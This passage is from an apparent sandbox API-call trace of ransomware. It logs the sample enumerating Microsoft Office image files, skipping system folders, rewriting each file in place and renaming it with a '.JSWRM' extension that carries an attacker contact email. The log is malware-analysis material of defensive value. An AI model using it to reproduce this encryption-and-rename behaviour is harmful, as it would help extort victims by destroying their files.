CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutofSyncIconImages.jpg", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0131.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutofSyncIconImages.jpg", cchWideChar=23, lpMultiByteStr=0x240f48, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutofSyncIconImages.jpg", lpUsedDefaultChar=0x0) returned 23 [0131.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\OutofSyncIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\outofsynciconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.136] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3981) returned 1 [0131.136] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.136] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xf80, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xf80, lpOverlapped=0x0) returned 1 [0131.138] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.138] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xf80, lpOverlapped=0x0) returned 1 [0131.138] CloseHandle (hObject=0x314) returned 1 [0131.138] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\OutofSyncIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\outofsynciconimages.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\OutofSyncIconImages.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\outofsynciconimages.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.143] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1977e6ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1977e6ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="OutofSyncIconImagesMask.bmp", cAlternateFileName="OUTOFS~1.BMP")) returned 1 [0131.143] lstrcmpiW (lpString1="OutofSyncIconImagesMask.bmp", lpString2=".") returned 1 [0131.143] lstrcmpiW (lpString1="OutofSyncIconImagesMask.bmp", lpString2="..") returned 1 [0131.143] lstrcmpiW (lpString1="OutofSyncIconImagesMask.bmp", lpString2="...") returned 1 [0131.143] lstrcmpiW (lpString1="OutofSyncIconImagesMask.bmp", lpString2="windows") returned -1 [0131.143] lstrcmpiW (lpString1="OutofSyncIconImagesMask.bmp", lpString2="recovery") returned -1 [0131.143] lstrcmpiW (lpString1="OutofSyncIconImagesMask.bmp", lpString2="perflogs") returned -1 [0131.143] lstrcmpiW (lpString1="OutofSyncIconImagesMask.bmp", lpString2="documents and settings") returned 1 [0131.143] lstrcmpiW (lpString1="OutofSyncIconImagesMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.143] lstrcmpiW (lpString1="OutofSyncIconImagesMask.bmp", lpString2="system volume information") returned -1 [0131.144] lstrcmpiW (lpString1="OutofSyncIconImagesMask.bmp", lpString2="msocache") returned 1 [0131.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutofSyncIconImagesMask.bmp", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0131.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutofSyncIconImagesMask.bmp", cchWideChar=27, lpMultiByteStr=0x241330, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutofSyncIconImagesMask.bmp", lpUsedDefaultChar=0x0) returned 27 [0131.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutofSyncIconImagesMask.bmp", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0131.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutofSyncIconImagesMask.bmp", cchWideChar=27, lpMultiByteStr=0x241358, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutofSyncIconImagesMask.bmp", lpUsedDefaultChar=0x0) returned 27 [0131.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\OutofSyncIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\outofsynciconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.145] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=192) returned 1 [0131.145] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.145] ReadFile (in: hFile=0x314, lpBuffer=0x24b448, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24b448*, lpNumberOfBytesRead=0x345e534*=0xc0, lpOverlapped=0x0) returned 1 [0131.146] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.146] WriteFile (in: hFile=0x314, lpBuffer=0x24b448*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24b448*, lpNumberOfBytesWritten=0x345e530*=0xc0, lpOverlapped=0x0) returned 1 [0131.146] CloseHandle (hObject=0x314) returned 1 [0131.146] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\OutofSyncIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\outofsynciconimagesmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\OutofSyncIconImagesMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\outofsynciconimagesmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.147] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1977e6ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1977e6ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc1b, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="QuestionIcon.jpg", cAlternateFileName="QUESTI~1.JPG")) returned 1 [0131.147] lstrcmpiW (lpString1="QuestionIcon.jpg", lpString2=".") returned 1 [0131.147] lstrcmpiW (lpString1="QuestionIcon.jpg", lpString2="..") returned 1 [0131.147] lstrcmpiW (lpString1="QuestionIcon.jpg", lpString2="...") returned 1 [0131.147] lstrcmpiW (lpString1="QuestionIcon.jpg", lpString2="windows") returned -1 [0131.147] lstrcmpiW (lpString1="QuestionIcon.jpg", lpString2="recovery") returned -1 [0131.147] lstrcmpiW (lpString1="QuestionIcon.jpg", lpString2="perflogs") returned 1 [0131.147] lstrcmpiW (lpString1="QuestionIcon.jpg", lpString2="documents and settings") returned 1 [0131.147] lstrcmpiW (lpString1="QuestionIcon.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.147] lstrcmpiW (lpString1="QuestionIcon.jpg", lpString2="system volume information") returned -1 [0131.147] lstrcmpiW (lpString1="QuestionIcon.jpg", lpString2="msocache") returned 1 [0131.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuestionIcon.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0131.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuestionIcon.jpg", cchWideChar=16, lpMultiByteStr=0x2410d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuestionIcon.jpg", lpUsedDefaultChar=0x0) returned 16 [0131.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuestionIcon.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0131.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuestionIcon.jpg", cchWideChar=16, lpMultiByteStr=0x241060, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuestionIcon.jpg", lpUsedDefaultChar=0x0) returned 16 [0131.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\QuestionIcon.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\questionicon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.149] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3099) returned 1 [0131.149] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.149] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xc10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xc10, lpOverlapped=0x0) returned 1 [0131.151] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.151] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xc10, lpOverlapped=0x0) returned 1 [0131.151] CloseHandle (hObject=0x314) returned 1 [0131.151] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\QuestionIcon.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\questionicon.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\QuestionIcon.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\questionicon.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.152] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1977e6ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1977e6ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x838, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="QuestionIconMask.bmp", cAlternateFileName="QUESTI~1.BMP")) returned 1 [0131.152] lstrcmpiW (lpString1="QuestionIconMask.bmp", lpString2=".") returned 1 [0131.152] lstrcmpiW (lpString1="QuestionIconMask.bmp", lpString2="..") returned 1 [0131.152] lstrcmpiW (lpString1="QuestionIconMask.bmp", lpString2="...") returned 1 [0131.152] lstrcmpiW (lpString1="QuestionIconMask.bmp", lpString2="windows") returned -1 [0131.152] lstrcmpiW (lpString1="QuestionIconMask.bmp", lpString2="recovery") returned -1 [0131.152] lstrcmpiW (lpString1="QuestionIconMask.bmp", lpString2="perflogs") returned 1 [0131.152] lstrcmpiW (lpString1="QuestionIconMask.bmp", lpString2="documents and settings") returned 1 [0131.152] lstrcmpiW (lpString1="QuestionIconMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.152] lstrcmpiW (lpString1="QuestionIconMask.bmp", lpString2="system volume information") returned -1 [0131.152] lstrcmpiW (lpString1="QuestionIconMask.bmp", lpString2="msocache") returned 1 [0131.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuestionIconMask.bmp", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuestionIconMask.bmp", cchWideChar=20, lpMultiByteStr=0x241330, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuestionIconMask.bmp", lpUsedDefaultChar=0x0) returned 20 [0131.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuestionIconMask.bmp", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuestionIconMask.bmp", cchWideChar=20, lpMultiByteStr=0x240f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuestionIconMask.bmp", lpUsedDefaultChar=0x0) returned 20 [0131.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\QuestionIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\questioniconmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.153] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2104) returned 1 [0131.153] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.153] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x830, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x830, lpOverlapped=0x0) returned 1 [0131.156] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.156] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x830, lpOverlapped=0x0) returned 1 [0131.156] CloseHandle (hObject=0x314) returned 1 [0131.157] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\QuestionIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\questioniconmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\QuestionIconMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\questioniconmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.157] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1977e6ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1977e6ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x64fa, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="Shared16x16Images.jpg", cAlternateFileName="SHARED~2.JPG")) returned 1 [0131.158] lstrcmpiW (lpString1="Shared16x16Images.jpg", lpString2=".") returned 1 [0131.158] lstrcmpiW (lpString1="Shared16x16Images.jpg", lpString2="..") returned 1 [0131.158] lstrcmpiW (lpString1="Shared16x16Images.jpg", lpString2="...") returned 1 [0131.158] lstrcmpiW (lpString1="Shared16x16Images.jpg", lpString2="windows") returned -1 [0131.158] lstrcmpiW (lpString1="Shared16x16Images.jpg", lpString2="recovery") returned 1 [0131.158] lstrcmpiW (lpString1="Shared16x16Images.jpg", lpString2="perflogs") returned 1 [0131.158] lstrcmpiW (lpString1="Shared16x16Images.jpg", lpString2="documents and settings") returned 1 [0131.158] lstrcmpiW (lpString1="Shared16x16Images.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.158] lstrcmpiW (lpString1="Shared16x16Images.jpg", lpString2="system volume information") returned -1 [0131.158] lstrcmpiW (lpString1="Shared16x16Images.jpg", lpString2="msocache") returned 1 [0131.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared16x16Images.jpg", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared16x16Images.jpg", cchWideChar=21, lpMultiByteStr=0x241010, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Shared16x16Images.jpg", lpUsedDefaultChar=0x0) returned 21 [0131.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared16x16Images.jpg", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared16x16Images.jpg", cchWideChar=21, lpMultiByteStr=0x2411c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Shared16x16Images.jpg", lpUsedDefaultChar=0x0) returned 21 [0131.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\Shared16x16Images.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\shared16x16images.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.159] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=25850) returned 1 [0131.159] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.159] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x64f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x64f0, lpOverlapped=0x0) returned 1 [0131.162] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.162] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x64f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x64f0, lpOverlapped=0x0) returned 1 [0131.162] CloseHandle (hObject=0x314) returned 1 [0131.162] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\Shared16x16Images.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\shared16x16images.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\Shared16x16Images.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\shared16x16images.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.163] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19758458, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19758458, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1977e6ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf38, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="Shared16x16ImagesMask.bmp", cAlternateFileName="SHARED~1.BMP")) returned 1 [0131.163] lstrcmpiW (lpString1="Shared16x16ImagesMask.bmp", lpString2=".") returned 1 [0131.163] lstrcmpiW (lpString1="Shared16x16ImagesMask.bmp", lpString2="..") returned 1 [0131.163] lstrcmpiW (lpString1="Shared16x16ImagesMask.bmp", lpString2="...") returned 1 [0131.163] lstrcmpiW (lpString1="Shared16x16ImagesMask.bmp", lpString2="windows") returned -1 [0131.163] lstrcmpiW (lpString1="Shared16x16ImagesMask.bmp", lpString2="recovery") returned 1 [0131.163] lstrcmpiW (lpString1="Shared16x16ImagesMask.bmp", lpString2="perflogs") returned 1 [0131.163] lstrcmpiW (lpString1="Shared16x16ImagesMask.bmp", lpString2="documents and settings") returned 1 [0131.164] lstrcmpiW (lpString1="Shared16x16ImagesMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.164] lstrcmpiW (lpString1="Shared16x16ImagesMask.bmp", lpString2="system volume information") returned -1 [0131.164] lstrcmpiW (lpString1="Shared16x16ImagesMask.bmp", lpString2="msocache") returned 1 [0131.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared16x16ImagesMask.bmp", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0131.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared16x16ImagesMask.bmp", cchWideChar=25, lpMultiByteStr=0x2412e0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Shared16x16ImagesMask.bmp", lpUsedDefaultChar=0x0) returned 25 [0131.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared16x16ImagesMask.bmp", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0131.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shared16x16ImagesMask.bmp", cchWideChar=25, lpMultiByteStr=0x2413a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Shared16x16ImagesMask.bmp", lpUsedDefaultChar=0x0) returned 25 [0131.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | 